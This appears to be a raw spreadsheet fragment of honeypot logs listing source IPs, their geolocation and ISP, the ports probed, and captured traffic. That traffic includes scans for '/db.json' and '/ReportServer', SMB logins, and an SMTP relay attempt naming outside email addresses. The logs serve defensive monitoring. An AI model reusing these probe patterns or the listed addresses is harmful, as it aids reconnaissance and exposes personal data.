'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:93b9:8478</t>
  </si>
  <si>
    <t>353c65d5e1211425909b7b541e99c681</t>
  </si>
  <si>
    <t>37.115.67.59</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;17096&amp;&amp;NA&amp;&amp;47291</t>
  </si>
  <si>
    <t>::ffff:2573:433b</t>
  </si>
  <si>
    <t>18af4363cc515bfe334a2c5f643f9f4c</t>
  </si>
  <si>
    <t>103.182.184.170</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H37&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;62504&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,50524)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,51079)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,53211)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,53755)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,51926)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,52741)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,56755)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,57230)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67b6:b8aa</t>
  </si>
  <si>
    <t>4d3054b7a350dcf47fbef81cd001d0c8</t>
  </si>
  <si>
    <t>122.165.66.138</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;389&amp;&amp;80&amp;&amp;22&amp;&amp;443&amp;&amp;445&amp;&amp;63339&amp;&amp;1433</t>
  </si>
  <si>
    <t>Chennai (Pattinapakkam)</t>
  </si>
  <si>
    <t>13.027</t>
  </si>
  <si>
    <t>80.2757</t>
  </si>
  <si>
    <t>ABTS Tamilnadu</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.165.66.138,52233)}&amp;&amp;{Data_SMB:Incoming connection (122.165.66.138,52697)}</t>
  </si>
  <si>
    <t>::ffff:7aa5:428a</t>
  </si>
  <si>
    <t>f35900c945fa3246e311e2183b66032b</t>
  </si>
  <si>
    <t>117.251.22.176</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;6253&amp;&amp;1433&amp;&amp;3306&amp;&amp;445&amp;&amp;60065&amp;&amp;60672</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.251.22.176,60065)}&amp;&amp;{Data_SMB:Incoming connection (117.251.22.176,60672)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:75fb:16b0</t>
  </si>
  <si>
    <t>db90a8dd253abeb0f011f1eebe5c1526</t>
  </si>
  <si>
    <t>106.215.158.84</t>
  </si>
  <si>
    <t>28.4595</t>
  </si>
  <si>
    <t>77.0266</t>
  </si>
  <si>
    <t>::ffff:6ad7:9e54</t>
  </si>
  <si>
    <t>a5ff6b46550b2c4f918ed7f9f81c0e6e</t>
  </si>
  <si>
    <t>2.103.110.156</t>
  </si>
  <si>
    <t>Oxfordshire</t>
  </si>
  <si>
    <t>Kidlington</t>
  </si>
  <si>
    <t>2645722</t>
  </si>
  <si>
    <t>51.8217</t>
  </si>
  <si>
    <t>-1.2886</t>
  </si>
  <si>
    <t>OPALTELECOM-AS</t>
  </si>
  <si>
    <t>::ffff:267:6e9c</t>
  </si>
  <si>
    <t>c345703cf581ee4c2288945b39b9bd46</t>
  </si>
  <si>
    <t>117.245.5.113</t>
  </si>
  <si>
    <t>::ffff:75f5:571</t>
  </si>
  <si>
    <t>2c1ed4565a66ee6cdb71feab1100e50c</t>
  </si>
  <si>
    <t>86.28.76.174</t>
  </si>
  <si>
    <t>WLS</t>
  </si>
  <si>
    <t>Wales</t>
  </si>
  <si>
    <t>Cardiff</t>
  </si>
  <si>
    <t>2653822</t>
  </si>
  <si>
    <t>CF10</t>
  </si>
  <si>
    <t>51.4837</t>
  </si>
  <si>
    <t>-3.1681</t>
  </si>
  <si>
    <t>The Vale Hotel Golf and Spa</t>
  </si>
  <si>
    <t>::ffff:561c:4cae</t>
  </si>
  <si>
    <t>6f725171366839280be5f5ab17e71b0c</t>
  </si>
  <si>
    <t>45.128.199.159</t>
  </si>
  <si>
    <t>['anonymous-proxy']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_RDP_H10&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>3389&amp;&amp;3306&amp;&amp;110&amp;&amp;1521&amp;&amp;21&amp;&amp;1433&amp;&amp;143&amp;&amp;443&amp;&amp;80</t>
  </si>
  <si>
    <t>62240</t>
  </si>
  <si>
    <t>Clouvider Limited</t>
  </si>
  <si>
    <t>VPN Consumer Amsterdam, The Netherlands</t>
  </si>
  <si>
    <t>2019-07-12</t>
  </si>
  <si>
    <t>connection&amp;&amp;stshash&amp;&amp;login</t>
  </si>
  <si>
    <t>{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;NA&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': '*', 'Connection': 'keep-alive', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': '*', 'Connection': 'keep-alive', 'Content-Length': '13', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0', 'method': 'POST', 'uri': '/live_env%20'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': '*', 'Connection': 'keep-alive', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/db.json'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': '*', 'Connection': 'keep-alive', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:2d80:c79f</t>
  </si>
  <si>
    <t>7983c0a34db3ee2a3d392adaa02fa5e0</t>
  </si>
  <si>
    <t>14.241.108.56</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H43&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>445&amp;&amp;5713&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>None&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:ef1:6c38</t>
  </si>
  <si>
    <t>1ae7ed582c660d30d610a988ea1b11b6</t>
  </si>
  <si>
    <t>109.120.137.150</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H34</t>
  </si>
  <si>
    <t>215730</t>
  </si>
  <si>
    <t>H2NEXUS LTD</t>
  </si>
  <si>
    <t>H2nexus LTD</t>
  </si>
  <si>
    <t>2009-08-27</t>
  </si>
  <si>
    <t>::ffff:6d78:8996</t>
  </si>
  <si>
    <t>edd1176cc577ca5000358d02ff274250</t>
  </si>
  <si>
    <t>61.3.45.226</t>
  </si>
  <si>
    <t>::ffff:3d03:2de2</t>
  </si>
  <si>
    <t>d4224bd25289c41d57f0321061c3b34c</t>
  </si>
  <si>
    <t>117.241.218.207</t>
  </si>
  <si>
    <t>::ffff:75f1:dacf</t>
  </si>
  <si>
    <t>27768d72d7b9be28ca52b74c5d53e09f</t>
  </si>
  <si>
    <t>109.231.20.68</t>
  </si>
  <si>
    <t>NA&amp;&amp;109.231.20.68.koba.pl</t>
  </si>
  <si>
    <t>Podlasie</t>
  </si>
  <si>
    <t>Białystok</t>
  </si>
  <si>
    <t>Bialystok</t>
  </si>
  <si>
    <t>776069</t>
  </si>
  <si>
    <t>53.1333</t>
  </si>
  <si>
    <t>23.1643</t>
  </si>
  <si>
    <t>34525</t>
  </si>
  <si>
    <t>KOBA Sp. z o.o.</t>
  </si>
  <si>
    <t>KOBA Sp. z o.o</t>
  </si>
  <si>
    <t>KoBa Internet</t>
  </si>
  <si>
    <t>::ffff:6de7:1444</t>
  </si>
  <si>
    <t>19590f1afe82e38eb720f043ebe57202</t>
  </si>
  <si>
    <t>221.120.34.108</t>
  </si>
  <si>
    <t>221-120-34-108.emome-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dd78:226c</t>
  </si>
  <si>
    <t>7eae1d80c15031a108dda2e1c2a5c886</t>
  </si>
  <si>
    <t>116.72.128.225</t>
  </si>
  <si>
    <t>::ffff:7448:80e1</t>
  </si>
  <si>
    <t>13afdee0ef1ea73b32b773875e16ab4c</t>
  </si>
  <si>
    <t>146.70.134.14</t>
  </si>
  <si>
    <t>M247 Ltd Zurich</t>
  </si>
  <si>
    <t>::ffff:9246:860e</t>
  </si>
  <si>
    <t>a8c7471e5a8ac9b73a5f33ce0f9cebdd</t>
  </si>
  <si>
    <t>59.95.181.59</t>
  </si>
  <si>
    <t>Broadband Project2.2</t>
  </si>
  <si>
    <t>::ffff:3b5f:b53b</t>
  </si>
  <si>
    <t>3e27eaaca1e7c003afa41756f55b6b0a</t>
  </si>
  <si>
    <t>103.147.8.149</t>
  </si>
  <si>
    <t>Bandung</t>
  </si>
  <si>
    <t>1650357</t>
  </si>
  <si>
    <t>-6.92222</t>
  </si>
  <si>
    <t>107.607</t>
  </si>
  <si>
    <t>2019-12-23</t>
  </si>
  <si>
    <t>IDNIC-APM-ID</t>
  </si>
  <si>
    <t>::ffff:6793:895</t>
  </si>
  <si>
    <t>4be807f6c5dd2a4bc5c7ad8186585c5c</t>
  </si>
  <si>
    <t>118.44.206.92</t>
  </si>
  <si>
    <t>::ffff:762c:ce5c</t>
  </si>
  <si>
    <t>66a4d4e544b73fa8766c22e139755f0f</t>
  </si>
  <si>
    <t>117.195.208.135</t>
  </si>
  <si>
    <t>::ffff:75c3:d087</t>
  </si>
  <si>
    <t>4673874495ea105acdadbfa8eee949c5</t>
  </si>
  <si>
    <t>195.211.191.186</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>25&amp;&amp;NA&amp;&amp;445</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;test@paradisefm.cw&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;riamtransfer@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;alejandrromayorkas@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;moneygram1184@yahoo.com.hk&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ekeneugboaja3@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;walmartcenter001@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (195.211.191.186,56365)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPBianca,WIN-4TTI4DH7SGH)}&amp;&amp;{Data_SMB:Incoming connection (195.211.191.186,62070)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPBianca,WIN-4TTI4DH7SGH)}&amp;&amp;{Data_SMB:Incoming connection (195.211.191.186,65307)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPBianca,WIN-4TTI4DH7SGH)}&amp;&amp;{Data_SMB:Incoming connection (195.211.191.186,51133)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPBianca,WIN-4TTI4DH7SGH)}&amp;&amp;{Data_SMB:Incoming connection (195.211.191.186,54365)}</t>
  </si>
  <si>
    <t>::ffff:c3d3:bfba</t>
  </si>
  <si>
    <t>96e92d8adbe45137773129177db89a2b</t>
  </si>
  <si>
    <t>101.51.251.101</t>
  </si>
  <si>
    <t>node-1dnp.pool-101-51.dynamic.nt-isp.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6533:fb65</t>
  </si>
  <si>
    <t>2a1d35c2170f41b210412e7a8f3f6964</t>
  </si>
  <si>
    <t>49.131.21.242</t>
  </si>
  <si>
    <t>::ffff:3183:15f2</t>
  </si>
  <si>
    <t>86b1500d73e65623fc89a8a56c7bf6a6</t>
  </si>
  <si>
    <t>117.194.182.146</t>
  </si>
  <si>
    <t>::ffff:75c2:b692</t>
  </si>
  <si>
    <t>350aec70bcff134365f0351555d48edc</t>
  </si>
  <si>
    <t>59.92.164.159</t>
  </si>
  <si>
    <t>::ffff:3b5c:a49f</t>
  </si>
  <si>
    <t>78e3fa2a19cfbfc447fcd2be5ad9b467</t>
  </si>
  <si>
    <t>113.165.218.215</t>
  </si>
  <si>
    <t>::ffff:71a5:dad7</t>
  </si>
  <si>
    <t>202e7c731e407e25b664d8192e8c87b4</t>
  </si>
  <si>
    <t>117.221.119.85</t>
  </si>
  <si>
    <t>::ffff:75dd:7755</t>
  </si>
  <si>
    <t>82bc9c29b8339be5d758356dab6b0317</t>
  </si>
  <si>
    <t>75.70.143.111</t>
  </si>
  <si>
    <t>c-75-70-143-111.hsd1.co.comcast.net</t>
  </si>
  <si>
    <t>Larimer</t>
  </si>
  <si>
    <t>Fort Collins</t>
  </si>
  <si>
    <t>5577147</t>
  </si>
  <si>
    <t>80523</t>
  </si>
  <si>
    <t>40.5853</t>
  </si>
  <si>
    <t>-105.084</t>
  </si>
  <si>
    <t>Comcast Cable Communications Holdings, Inc</t>
  </si>
  <si>
    <t>::ffff:4b46:8f6f</t>
  </si>
  <si>
    <t>b6ea39300e9b3b61cd22e534bd23c92f</t>
  </si>
  <si>
    <t>59.182.247.217</t>
  </si>
  <si>
    <t>Kanniyakumari</t>
  </si>
  <si>
    <t>Nagercoil</t>
  </si>
  <si>
    <t>1262204</t>
  </si>
  <si>
    <t>8.17899</t>
  </si>
  <si>
    <t>77.4323</t>
  </si>
  <si>
    <t>::ffff:3bb6:f7d9</t>
  </si>
  <si>
    <t>17e6573bbe448baa04c26b4991157e6b</t>
  </si>
  <si>
    <t>182.152.205.204</t>
  </si>
  <si>
    <t>::ffff:b698:cdcc</t>
  </si>
  <si>
    <t>788b8c0c17a64429fda229ea3223044a</t>
  </si>
  <si>
    <t>103.139.139.10</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;41916&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>Kabupaten Toba Samosir</t>
  </si>
  <si>
    <t>Balige</t>
  </si>
  <si>
    <t>1215510</t>
  </si>
  <si>
    <t>2.39557</t>
  </si>
  <si>
    <t>99.1573</t>
  </si>
  <si>
    <t>149965</t>
  </si>
  <si>
    <t>PT. TOBA JAYA NET</t>
  </si>
  <si>
    <t>2022-08-16</t>
  </si>
  <si>
    <t>IDNIC-TOBAJAYA-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,57401)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,59576)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,60260)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,55702)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,56401)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,55331)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,55965)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,64933)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,49607)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:678b:8b0a</t>
  </si>
  <si>
    <t>568b684e30708135156b065a9df360d9</t>
  </si>
  <si>
    <t>135.237.126.6</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_POSTGRES_HC1</t>
  </si>
  <si>
    <t>80&amp;&amp;5432&amp;&amp;6379&amp;&amp;NA</t>
  </si>
  <si>
    <t>MICROSOFT</t>
  </si>
  <si>
    <t>{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ReportServer'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:87ed:7e06</t>
  </si>
  <si>
    <t>86e4837f5f51ded3149a1e26876ace30</t>
  </si>
  <si>
    <t>59.127.93.192</t>
  </si>
  <si>
    <t>59-127-93-192.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;2826&amp;&amp;80&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7f:5dc0</t>
  </si>
  <si>
    <t>7167cf02ff1dbc75020085aa4239da86</t>
  </si>
  <si>
    <t>103.10.71.49</t>
  </si>
  <si>
    <t>-6.92067</t>
  </si>
  <si>
    <t>107.601</t>
  </si>
  <si>
    <t>150210</t>
  </si>
  <si>
    <t>PT Wadma Berkah Sedaya</t>
  </si>
  <si>
    <t>::ffff:670a:4731</t>
  </si>
  <si>
    <t>ec78671d129e5fdef2cda44909c8a094</t>
  </si>
  <si>
    <t>103.125.233.13</t>
  </si>
  <si>
    <t>22.3964</t>
  </si>
  <si>
    <t>114.109</t>
  </si>
  <si>
    <t>9312</t>
  </si>
  <si>
    <t>xTom Hong Kong Limited</t>
  </si>
  <si>
    <t>2018-11-23</t>
  </si>
  <si>
    <t>OWL-HK-02</t>
  </si>
  <si>
    <t>::ffff:677d:e90d</t>
  </si>
  <si>
    <t>c42e565af5514fd00d50edbc3376391d</t>
  </si>
  <si>
    <t>202.66.165.173</t>
  </si>
  <si>
    <t>static-ip-173-165-66-202.rev.dyxnet.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>South Delhi</t>
  </si>
  <si>
    <t>Aya Nagar</t>
  </si>
  <si>
    <t>13157005</t>
  </si>
  <si>
    <t>28.472</t>
  </si>
  <si>
    <t>77.1327</t>
  </si>
  <si>
    <t>134337</t>
  </si>
  <si>
    <t>R2 Net Solutions Pvt Ltd</t>
  </si>
  <si>
    <t>::ffff:ca42:a5ad</t>
  </si>
  <si>
    <t>07e352efe469d8a322ce6da95ebf940c</t>
  </si>
  <si>
    <t>117.197.194.100</t>
  </si>
  <si>
    <t>::ffff:75c5:c264</t>
  </si>
  <si>
    <t>e9a8b337dabd556cddd89c6d8488683e</t>
  </si>
  <si>
    <t>59.95.123.8</t>
  </si>
  <si>
    <t>::ffff:3b5f:7b08</t>
  </si>
  <si>
    <t>1d9790f7332034ec676c28cb66fc1f1c</t>
  </si>
  <si>
    <t>112.166.102.71</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>::ffff:70a6:6647</t>
  </si>
  <si>
    <t>09e00f273fe4790b52e1dced33b08461</t>
  </si>
  <si>
    <t>45.248.12.70</t>
  </si>
  <si>
    <t>U.p. Communication Services PVT LTD</t>
  </si>
  <si>
    <t>::ffff:2df8:c46</t>
  </si>
  <si>
    <t>4a4792aaecda9fa489bf539e792a342a</t>
  </si>
  <si>
    <t>103.100.209.247</t>
  </si>
  <si>
    <t>22.3692</t>
  </si>
  <si>
    <t>114.132</t>
  </si>
  <si>
    <t>142403</t>
  </si>
  <si>
    <t>YISU CLOUD LTD</t>
  </si>
  <si>
    <t>Yisu Cloud LTD</t>
  </si>
  <si>
    <t>Ancent Group Limited</t>
  </si>
  <si>
    <t>2017-09-12</t>
  </si>
  <si>
    <t>YISUCLOUDLTD-HK</t>
  </si>
  <si>
    <t>::ffff:6764:d1f7</t>
  </si>
  <si>
    <t>61b06dc946eddbd497b11ca30c617fa8</t>
  </si>
  <si>
    <t>117.231.135.128</t>
  </si>
  <si>
    <t>::ffff:75e7:8780</t>
  </si>
  <si>
    <t>37e9b86d053744e59d3afb9e852832ac</t>
  </si>
  <si>
    <t>5.187.133.7</t>
  </si>
  <si>
    <t>HU</t>
  </si>
  <si>
    <t>Hungary</t>
  </si>
  <si>
    <t>Pest County</t>
  </si>
  <si>
    <t>Érd</t>
  </si>
  <si>
    <t>3053281</t>
  </si>
  <si>
    <t>2030</t>
  </si>
  <si>
    <t>47.392</t>
  </si>
  <si>
    <t>18.9045</t>
  </si>
  <si>
    <t>5483</t>
  </si>
  <si>
    <t>Magyar Telekom plc.</t>
  </si>
  <si>
    <t>Magyar Telekom</t>
  </si>
  <si>
    <t>2012-08-10</t>
  </si>
  <si>
    <t>::ffff:5bb:8507</t>
  </si>
  <si>
    <t>2acaa999d3a9db68b38218e4f07dae11</t>
  </si>
  <si>
    <t>117.207.172.226</t>
  </si>
  <si>
    <t>::ffff:75cf:ace2</t>
  </si>
  <si>
    <t>f67e7d8529ab88103bebe85a53cfdfbf</t>
  </si>
  <si>
    <t>114.35.96.179</t>
  </si>
  <si>
    <t>114-35-96-179.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_SSH_H19&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;22&amp;&amp;443&amp;&amp;80&amp;&amp;64168&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7223:60b3</t>
  </si>
  <si>
    <t>19cc5fe374a5b256c2749d21585319e0</t>
  </si>
  <si>
    <t>160.238.95.229</t>
  </si>
  <si>
